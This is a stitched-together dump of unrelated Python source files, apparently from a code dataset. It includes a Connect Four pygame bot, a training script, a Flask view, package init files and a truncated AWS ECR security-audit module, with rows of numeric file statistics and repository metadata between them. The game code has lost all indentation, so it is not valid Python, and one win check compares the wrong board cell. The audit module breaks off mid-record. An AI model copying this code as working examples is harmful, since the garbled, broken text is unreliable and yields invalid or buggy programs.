def change_end_game_caption(self):
game_result_caption = ""
print("Game is finished!")
if (self.check_is_finished() == 1):
if (self.color == 1): game_result_caption = "Computer won!"
else: game_result_caption = "Player won!"
elif (self.check_is_finished() == 2):
if (self.color == -1): game_result_caption = "Computer won!"
else: game_result_caption = "Player won!"
else: game_result_caption = "Computer won!"
pygame.display.set_caption(game_result_caption)
def get_input(self):
no_input = True
while(no_input):
for event in pygame.event.get():
if event.type == pygame.locals.QUIT:
pygame.quit()
sys.exit()
elif (event.type == pygame.locals.MOUSEBUTTONUP and event.button == 1):
cursor_x = pygame.mouse.get_pos()[0]
cursor_y = pygame.mouse.get_pos()[1]
if ((cursor_x > X_MARGIN) and (cursor_x < BOARDWIDTH + X_MARGIN) and (cursor_y > Y_MARGIN) and (cursor_y < (BOARDHEIGHT / (7) + Y_MARGIN))):
x_coord = (cursor_x - X_MARGIN) / SQUARE_SIZE
#y_coord = (cursor_y - Y_MARGIN) / SQUARE_SIZE
#print("clicked at {}".format(x_coord))
no_input = False
time.sleep(0.1)
#print("left while loop with x_coord = {}".format(int(x_coord)))
#self.make_move_on_board(int(x_coord), -self.color)
return int(x_coord)
def make_move(self):
#if (self.move_number == 42):
#self.is_finished ==
#print("entered make move!")
if (self.side_to_move == 42):#it's player turn
input_move = self.get_input()
#print("move received from input: {}".format(input_move))
if (str(input_move) in self.get_valid_moves()):
self.make_move_on_board(input_move, -self.color)
self.move_number += 1
self.side_to_move *= -1
else:#it's computer turn
start_time = time.time()
computer_move = self.root_search_negamax(self.color, MINIMAX_DEPTH, ALPHA_0, BETA_0)
#computer_move = self.root_search_pvs(self.color, MINIMAX_DEPTH, ALPHA_0, BETA_0)
#computer_move = random.randint(0, 6)
self.make_move_on_board(computer_move, self.color)
#print("made move {}".format(computer_move))
#print("current board: {}".format(self.board))
self.move_number += 1
self.side_to_move *= -1
end_time = time.time()
print("computer thought for {} seconds".format(end_time - start_time))
def check_is_finished(self):
#if (self.is_terminal_node(1) == 0): self.is_finished = True
for i in range(6): # check for horizontal win/loss
for j in range(4):
if (self.board[i][j] == self.board[i][j + 1] == self.board[i][j + 2] == self.board[i][j + 3] == '1'): return 1
if (self.board[i][j] == self.board[i][j + 1] == self.board[i][j + 2] == self.board[i][j + 3] == '2'): return 2
for j in range(7): # check for vertical win/loss
for i in range(3):
if (self.board[i][j] == self.board[i + 1][j] == self.board[i + 2][j] == self.board[i + 3][j] == '1'): return 1
if (self.board[i][j] == self.board[i + 1][j] == self.board[i + 2][j] == self.board[i + 3][j] == '2'): return 2
# check for bottom_left -> top_right diagonal win/loss
if (self.board[3][0] == self.board[2][1] == self.board[1][2] == self.board[0][3] == '1'): return 1
if (self.board[3][0] == self.board[2][1] == self.board[1][2] == self.board[0][3] == '2'): return 2
if (self.board[4][0] == self.board[3][1] == self.board[2][2] == self.board[1][3] == '1'): return 1
if (self.board[4][0] == self.board[3][1] == self.board[2][2] == self.board[1][3] == '2'): return 2
if (self.board[3][1] == self.board[2][2] == self.board[1][3] == self.board[0][4] == '1'): return 1
if (self.board[3][1] == self.board[2][2] == self.board[1][3] == self.board[0][4] == '2'): return 2
if (self.board[5][0] == self.board[4][1] == self.board[3][2] == self.board[2][3] == '1'): return 1
if (self.board[5][0] == self.board[4][1] == self.board[3][2] == self.board[2][3] == '2'): return 2
if (self.board[4][1] == self.board[3][2] == self.board[2][3] == self.board[1][4] == '1'): return 1
if (self.board[4][1] == self.board[3][2] == self.board[2][3] == self.board[1][4] == '2'): return 2
if (self.board[3][2] == self.board[2][3] == self.board[1][4] == self.board[0][5] == '1'): return 1
if (self.board[3][2] == self.board[2][3] == self.board[1][4] == self.board[0][5] == '2'): return 2
if (self.board[5][1] == self.board[4][2] == self.board[3][3] == self.board[2][4] == '1'): return 1
if (self.board[5][1] == self.board[4][2] == self.board[3][3] == self.board[2][4] == '2'): return 2
if (self.board[4][2] == self.board[3][3] == self.board[2][4] == self.board[1][5] == '1'): return 1
if (self.board[4][2] == self.board[3][3] == self.board[2][4] == self.board[1][5] == '2'): return 2
if (self.board[3][3] == self.board[2][4] == self.board[1][5] == self.board[0][6] == '1'): return 1
if (self.board[3][3] == self.board[2][4] == self.board[1][5] == self.board[0][6] == '2'): return 2
if (self.board[5][2] == self.board[4][3] == self.board[3][4] == self.board[2][5] == '1'): return 1
if (self.board[5][2] == self.board[4][3] == self.board[3][4] == self.board[2][5] == '2'): return 2
if (self.board[4][3] == self.board[3][4] == self.board[2][5] == self.board[1][6] == '1'): return 1
if (self.board[4][3] == self.board[3][4] == self.board[2][5] == self.board[1][6] == '2'): return 2
if (self.board[5][3] == self.board[4][4] == self.board[3][5] == self.board[2][6] == '1'): return 1
if (self.board[5][3] == self.board[4][4] == self.board[3][5] == self.board[2][6] == '2'): return 2
# check for bottom_right -> top_left diagonal win/loss
if (self.board[2][0] == self.board[3][1] == self.board[4][2] == self.board[5][3] == '1'): return 1
if (self.board[2][0] == self.board[3][1] == self.board[4][2] == self.board[5][3] == '2'): return 2
if (self.board[1][0] == self.board[2][1] == self.board[3][2] == self.board[4][3] == '1'): return 1
if (self.board[1][0] == self.board[2][1] == self.board[3][2] == self.board[4][3] == '2'): return 2
if (self.board[2][1] == self.board[3][2] == self.board[4][3] == self.board[5][4] == '1'): return 1
if (self.board[2][1] == self.board[3][2] == self.board[4][3] == self.board[5][4] == '2'): return 2
if (self.board[0][0] == self.board[1][1] == self.board[2][2] == self.board[3][3] == '1'): return 1
if (self.board[0][0] == self.board[1][1] == self.board[2][2] == self.board[3][3] == '2'): return 2
if (self.board[1][1] == self.board[2][2] == self.board[3][3] == self.board[4][4] == '1'): return 1
if (self.board[1][1] == self.board[2][2] == self.board[3][3] == self.board[4][4] == '2'): return 2
if (self.board[2][2] == self.board[3][3] == self.board[4][4] == self.board[5][5] == '1'): return 1
if (self.board[2][2] == self.board[3][3] == self.board[4][4] == self.board[5][5] == '2'): return 2
if (self.board[0][1] == self.board[1][2] == self.board[2][3] == self.board[3][4] == '1'): return 1
if (self.board[0][1] == self.board[1][2] == self.board[2][3] == self.board[3][4] == '2'): return 2
if (self.board[1][2] == self.board[2][3] == self.board[3][4] == self.board[4][5] == '1'): return 1
if (self.board[1][2] == self.board[2][3] == self.board[3][4] == self.board[4][5] == '2'): return 2
if (self.board[2][3] == self.board[3][4] == self.board[4][5] == self.board[5][6] == '1'): return 1
if (self.board[2][3] == self.board[3][4] == self.board[5][5] == self.board[5][6] == '2'): return 2
if (self.board[0][2] == self.board[1][3] == self.board[2][4] == self.board[3][5] == '1'): return 1
if (self.board[0][2] == self.board[1][3] == self.board[2][4] == self.board[3][5] == '2'): return 2
if (self.board[1][3] == self.board[2][4] == self.board[3][5] == self.board[4][6] == '1'): return 1
if (self.board[1][3] == self.board[2][4] == self.board[3][5] == self.board[4][6] == '2'): return 2
if (self.board[0][3] == self.board[1][4] == self.board[2][5] == self.board[3][6] == '1'): return 1
if (self.board[0][3] == self.board[1][4] == self.board[2][5] == self.board[3][6] == '2'): return 2
for row in self.board:# returns 0 in case the node is not terminal
if ('0' in row): return 0
return 3 # returns 3 in case the node is terminal
def main():
random.seed()
my_bot = Bot()
my_bot.draw_choose_first_move()
my_bot.draw_board()
while(my_bot.play_again):
while (not my_bot.is_finished):
my_bot.make_move()
my_bot.draw_board()
if (my_bot.check_is_finished() != 0): break
my_bot.show_game_result()
my_bot.show_play_again_dialog()
if (not my_bot.play_again):
pygame.quit()
sys.exit()
break
my_bot = Bot()
my_bot.draw_choose_first_move()
time.sleep(5)
if __name__ == "__main__":
main()
| 65.910663
| 385
| 0.601023
| 11,828
| 68,613
| 3.349679
| 0.022912
| 0.320293
| 0.101893
| 0.08208
| 0.871353
| 0.852701
| 0.82789
| 0.809692
| 0.783872
| 0.757824
| 0
| 0.066047
| 0.162127
| 68,613
| 1,040
| 386
| 65.974038
| 0.623128
| 0.095448
| 0
| 0.256188
| 0
| 0
| 0.016964
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033416
| false
| 0
| 0.006188
| 0.001238
| 0.063119
| 0.006188
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5708934c2a2912a9fae8abb3094316b7fcde4905
| 160
|
py
|
Python
|
MLPcluster/expBuildWd2.py
|
ryan75195/Deep-Learning
|
899e593cc8e8a7857b93b8d2885250e4b0cb76b6
|
[
"MIT"
] | null | null | null |
MLPcluster/expBuildWd2.py
|
ryan75195/Deep-Learning
|
899e593cc8e8a7857b93b8d2885250e4b0cb76b6
|
[
"MIT"
] | null | null | null |
MLPcluster/expBuildWd2.py
|
ryan75195/Deep-Learning
|
899e593cc8e8a7857b93b8d2885250e4b0cb76b6
|
[
"MIT"
] | null | null | null |
import train_model
#resnet18
train_model.run_experiment(34,1e-5,0.001)
train_model.run_experiment(34,1e-5,0.0001)
train_model.run_experiment(34,1e-5,0.00001)
| 20
| 43
| 0.8125
| 31
| 160
| 3.967742
| 0.419355
| 0.325203
| 0.317073
| 0.560976
| 0.707317
| 0.707317
| 0.707317
| 0.707317
| 0
| 0
| 0
| 0.190789
| 0.05
| 160
| 7
| 44
| 22.857143
| 0.618421
| 0.05
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5719297863b93980c8c13ec6215ee8bdf1fb654a
| 95
|
py
|
Python
|
hemp/web/views/topology.py
|
nobuhikosekiya/sbx_multi_ios
|
9a8e540617d46fd98f466d89e1f9af4f8a1797aa
|
[
"MIT"
] | 64
|
2018-08-18T01:13:18.000Z
|
2021-12-09T17:46:35.000Z
|
hemp/web/views/topology.py
|
nobuhikosekiya/sbx_multi_ios
|
9a8e540617d46fd98f466d89e1f9af4f8a1797aa
|
[
"MIT"
] | 45
|
2018-08-16T21:26:11.000Z
|
2021-12-13T19:58:20.000Z
|
hemp/web/views/topology.py
|
nobuhikosekiya/sbx_multi_ios
|
9a8e540617d46fd98f466d89e1f9af4f8a1797aa
|
[
"MIT"
] | 37
|
2018-09-23T04:09:53.000Z
|
2021-11-11T16:39:37.000Z
|
from flask import render_template
def topology():
return render_template('topology.html')
| 19
| 43
| 0.778947
| 12
| 95
| 6
| 0.75
| 0.388889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136842
| 95
| 4
| 44
| 23.75
| 0.878049
| 0
| 0
| 0
| 0
| 0
| 0.136842
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 7
|
57553400ee69c90f43af992089bdcdef8b989dd9
| 403
|
py
|
Python
|
seeq/addons/mps/__init__.py
|
seeq12/seeq-mps
|
aaa7bb6ffae2db3333c991edac64377aff6d8c24
|
[
"Apache-2.0"
] | 4
|
2021-11-17T00:18:04.000Z
|
2022-03-04T07:44:39.000Z
|
seeq/addons/mps/__init__.py
|
seeq12/seeq-mps
|
aaa7bb6ffae2db3333c991edac64377aff6d8c24
|
[
"Apache-2.0"
] | 1
|
2021-11-04T14:38:20.000Z
|
2021-11-12T06:05:33.000Z
|
seeq/addons/mps/__init__.py
|
seeq12/seeq-mps
|
aaa7bb6ffae2db3333c991edac64377aff6d8c24
|
[
"Apache-2.0"
] | null | null | null |
from ._version import __version__
from ._mps import load_ref, save_ref, pull_mps_data, seeq_mps_dtw_batch, push_mps_results_batch, seeq_mps_mass, \
seeq_mps_dtw, push_mps_results
from ._mps_sdl_ui import MpsUI
__all__ = ['__version__', 'load_ref', 'save_ref', 'pull_mps_data', 'seeq_mps_dtw_batch', 'push_mps_results_batch',
'seeq_mps_mass', 'seeq_mps_dtw', 'push_mps_results', 'MpsUI']
| 50.375
| 114
| 0.774194
| 64
| 403
| 4.109375
| 0.296875
| 0.159696
| 0.152091
| 0.106464
| 0.714829
| 0.714829
| 0.714829
| 0.714829
| 0.714829
| 0.714829
| 0
| 0
| 0.119107
| 403
| 7
| 115
| 57.571429
| 0.740845
| 0
| 0
| 0
| 0
| 0
| 0.312655
| 0.054591
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
93c45644d1bf5172b15c746f7a5d010139cdacc0
| 396
|
py
|
Python
|
piudb/__init__.py
|
Peiiii/piudb
|
fb580fb4bb6004374095c9a4e4bab1eb24a33338
|
[
"MIT"
] | null | null | null |
piudb/__init__.py
|
Peiiii/piudb
|
fb580fb4bb6004374095c9a4e4bab1eb24a33338
|
[
"MIT"
] | null | null | null |
piudb/__init__.py
|
Peiiii/piudb
|
fb580fb4bb6004374095c9a4e4bab1eb24a33338
|
[
"MIT"
] | null | null | null |
__name__="piudb"
__author__ = "Wang Pei"
from .classes import (
InfoBody,TableManager,Table,Map,
Model,ModelMetaclass,Field,StringField,
IntegerField,BooleanField,TextField,FloatField,ObjectField,
Piu
)
__all__= [
'InfoBody','TableManager','Table','Map',
'Model','ModelMetaclass','Field','StringField',
'IntegerField','BooleanField','TextField','FloatField',
'Piu'
]
| 23.294118
| 63
| 0.714646
| 36
| 396
| 7.527778
| 0.638889
| 0.147601
| 0.184502
| 0.206642
| 0.782288
| 0.782288
| 0.782288
| 0.782288
| 0.782288
| 0.782288
| 0
| 0
| 0.126263
| 396
| 17
| 64
| 23.294118
| 0.783237
| 0
| 0
| 0
| 0
| 0
| 0.308081
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f50db3364b333b155eb6c24726a5a85be771d447
| 168
|
py
|
Python
|
tia/rlab/__init__.py
|
AmarisAI/tia
|
a7043b6383e557aeea8fc7112bbffd6e36a230e9
|
[
"BSD-3-Clause"
] | 366
|
2015-01-21T21:57:23.000Z
|
2022-03-29T09:11:24.000Z
|
tia/rlab/__init__.py
|
AmarisAI/tia
|
a7043b6383e557aeea8fc7112bbffd6e36a230e9
|
[
"BSD-3-Clause"
] | 51
|
2015-03-01T14:20:44.000Z
|
2021-08-19T15:46:51.000Z
|
tia/rlab/__init__.py
|
AmarisAI/tia
|
a7043b6383e557aeea8fc7112bbffd6e36a230e9
|
[
"BSD-3-Clause"
] | 160
|
2015-02-22T07:16:17.000Z
|
2022-03-29T13:41:15.000Z
|
# Monkey patch module
import tia.rlab.patch
from tia.rlab.components import *
from tia.rlab.table import *
from tia.rlab.builder import *
from tia.rlab.font import *
| 18.666667
| 33
| 0.767857
| 27
| 168
| 4.777778
| 0.407407
| 0.271318
| 0.341085
| 0.395349
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 168
| 8
| 34
| 21
| 0.895833
| 0.113095
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f575f17488a954f2b84a89ca8b857bb93f0fdd70
| 163
|
py
|
Python
|
optimus/engines/dask_cudf/rows.py
|
ironmussa/Optimus
|
fbaea6e0957f0bc016280a85ff021904faac20c5
|
[
"Apache-2.0"
] | 1,045
|
2017-07-17T17:59:46.000Z
|
2021-06-15T07:06:48.000Z
|
optimus/engines/dask_cudf/rows.py
|
ironmussa/Optimus
|
fbaea6e0957f0bc016280a85ff021904faac20c5
|
[
"Apache-2.0"
] | 955
|
2017-07-14T15:47:58.000Z
|
2021-05-27T14:16:24.000Z
|
optimus/engines/dask_cudf/rows.py
|
ironmussa/Optimus
|
fbaea6e0957f0bc016280a85ff021904faac20c5
|
[
"Apache-2.0"
] | 226
|
2017-08-04T20:41:33.000Z
|
2021-05-21T08:28:33.000Z
|
from optimus.engines.base.cudf.rows import CUDFBaseRows
from optimus.engines.base.dask.rows import DaskBaseRows
class Rows(CUDFBaseRows, DaskBaseRows):
pass
| 23.285714
| 55
| 0.815951
| 21
| 163
| 6.333333
| 0.571429
| 0.165414
| 0.270677
| 0.330827
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110429
| 163
| 6
| 56
| 27.166667
| 0.917241
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
1947dda77c56a1ad0cd60d144491c80361fc0fde
| 38,854
|
py
|
Python
|
eeauditor/auditors/aws/Amazon_ECR_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 442
|
2020-03-15T20:56:36.000Z
|
2022-03-31T22:13:07.000Z
|
eeauditor/auditors/aws/Amazon_ECR_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 57
|
2020-03-15T22:09:56.000Z
|
2022-03-31T13:17:06.000Z
|
eeauditor/auditors/aws/Amazon_ECR_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 59
|
2020-03-15T21:19:10.000Z
|
2022-03-31T15:01:31.000Z
|
#This file is part of ElectricEye.
#SPDX-License-Identifier: Apache-2.0
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
import boto3
import datetime
import botocore
from check_register import CheckRegister
registry = CheckRegister()
# import boto3 clients
ecr = boto3.client("ecr")
# loop through ECR repos
def describe_repositories(cache):
response = cache.get("describe_repositories")
if response:
return response
cache["describe_repositories"] = ecr.describe_repositories(maxResults=1000)
return cache["describe_repositories"]
@registry.register_check("ecr")
def ecr_repo_vuln_scan_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[ECR.1] ECR repositories should be configured to scan images on push"""
response = describe_repositories(cache)
myRepos = response["repositories"]
for repo in myRepos:
repoArn = str(repo["repositoryArn"])
repoName = str(repo["repositoryName"])
scanningConfig = str(repo["imageScanningConfiguration"]["scanOnPush"])
# ISO Time
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if scanningConfig == "False":
finding = {
"SchemaVersion": "2018-10-08",
"Id": repoArn + "/ecr-no-scan",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": repoArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[ECR.1] ECR repositories should be configured to scan images on push",
"Description": "ECR repository "
+ repoName
+ " is not configured to scan images on push. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your repository should be configured to scan on push refer to the Image Scanning section in the Amazon ECR User Guide",
"Url": "https://docs.aws.amazon.com/AmazonECR/latest/userguide/image-scanning.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEcrRepository",
"Id": repoArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"RepositoryName": repoName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF DE.CM-8",
"NIST SP 800-53 RA-5",
"AICPA TSC CC7.1",
"ISO 27001:2013 A.12.6.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": repoArn + "/ecr-no-scan",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": repoArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[ECR.1] ECR repositories should be configured to scan images on push",
"Description": "ECR repository "
+ repoName
+ " is configured to scan images on push.",
"Remediation": {
"Recommendation": {
"Text": "If your repository should be configured to scan on push refer to the Image Scanning section in the Amazon ECR User Guide",
"Url": "https://docs.aws.amazon.com/AmazonECR/latest/userguide/image-scanning.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEcrRepository",
"Id": repoArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"RepositoryName": repoName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF DE.CM-8",
"NIST SP 800-53 RA-5",
"AICPA TSC CC7.1",
"ISO 27001:2013 A.12.6.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("ecr")
def ecr_repo_image_lifecycle_policy_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[ECR.2] ECR repositories should be have an image lifecycle policy configured"""
response = describe_repositories(cache)
myRepos = response["repositories"]
for repo in myRepos:
repoArn = str(repo["repositoryArn"])
repoName = str(repo["repositoryName"])
# ISO Time
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
try:
# this is a passing finding
response = ecr.get_lifecycle_policy(repositoryName=repoName)
finding = {
"SchemaVersion": "2018-10-08",
"Id": repoArn + "/ecr-lifecycle-policy-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": repoArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[ECR.2] ECR repositories should be have an image lifecycle policy configured",
"Description": "ECR repository "
+ repoName
+ " does not have an image lifecycle policy configured. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your repository should be configured to have an image lifecycle policy refer to the Amazon ECR Lifecycle Policies section in the Amazon ECR User Guide",
"Url": "https://docs.aws.amazon.com/AmazonECR/latest/userguide/LifecyclePolicies.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEcrRepository",
"Id": repoArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"RepositoryName": repoName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF ID.AM-2",
"NIST SP 800-53 CM-8",
"NIST SP 800-53 PM-5",
"AICPA TSC CC3.2",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.1.1",
"ISO 27001:2013 A.8.1.2",
"ISO 27001:2013 A.12.5.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
except:
finding = {
"SchemaVersion": "2018-10-08",
"Id": repoArn + "/ecr-lifecycle-policy-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": repoArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[ECR.2] ECR repositories should be have an image lifecycle policy configured",
"Description": "ECR repository "
+ repoName
+ " does not have an image lifecycle policy configured. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your repository should be configured to have an image lifecycle policy refer to the Amazon ECR Lifecycle Policies section in the Amazon ECR User Guide",
"Url": "https://docs.aws.amazon.com/AmazonECR/latest/userguide/LifecyclePolicies.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEcrRepository",
"Id": repoArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"RepositoryName": repoName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF ID.AM-2",
"NIST SP 800-53 CM-8",
"NIST SP 800-53 PM-5",
"AICPA TSC CC3.2",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.1.1",
"ISO 27001:2013 A.8.1.2",
"ISO 27001:2013 A.12.5.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
@registry.register_check("ecr")
def ecr_repo_permission_policy_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[ECR.3] ECR repositories should be have a repository policy configured"""
response = describe_repositories(cache)
myRepos = response["repositories"]
for repo in myRepos:
repoArn = str(repo["repositoryArn"])
repoName = str(repo["repositoryName"])
# ISO Time
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
try:
# this is a passing finding
response = ecr.get_repository_policy(repositoryName=repoName)
finding = {
"SchemaVersion": "2018-10-08",
"Id": repoArn + "/ecr-repo-access-policy-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": repoArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[ECR.3] ECR repositories should be have a repository policy configured",
"Description": "ECR repository "
+ repoName
+ " has a repository policy configured.",
"Remediation": {
"Recommendation": {
"Text": "If your repository should be configured to have a repository policy refer to the Amazon ECR Repository Policies section in the Amazon ECR User Guide",
"Url": "https://docs.aws.amazon.com/AmazonECR/latest/userguide/repository-policies.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEcrRepository",
"Id": repoArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"RepositoryName": repoName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-6",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 AC-3",
"NIST SP 800-53 AC-16",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-24",
"NIST SP 800-53 IA-1",
"NIST SP 800-53 IA-2",
"NIST SP 800-53 IA-4",
"NIST SP 800-53 IA-5",
"NIST SP 800-53 IA-8",
"NIST SP 800-53 PE-2",
"NIST SP 800-53 PS-3",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.7.1.1",
"ISO 27001:2013 A.9.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
except:
finding = {
"SchemaVersion": "2018-10-08",
"Id": repoArn + "/ecr-repo-access-policy-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": repoArn,
"AwsAccountId": awsAccountId,
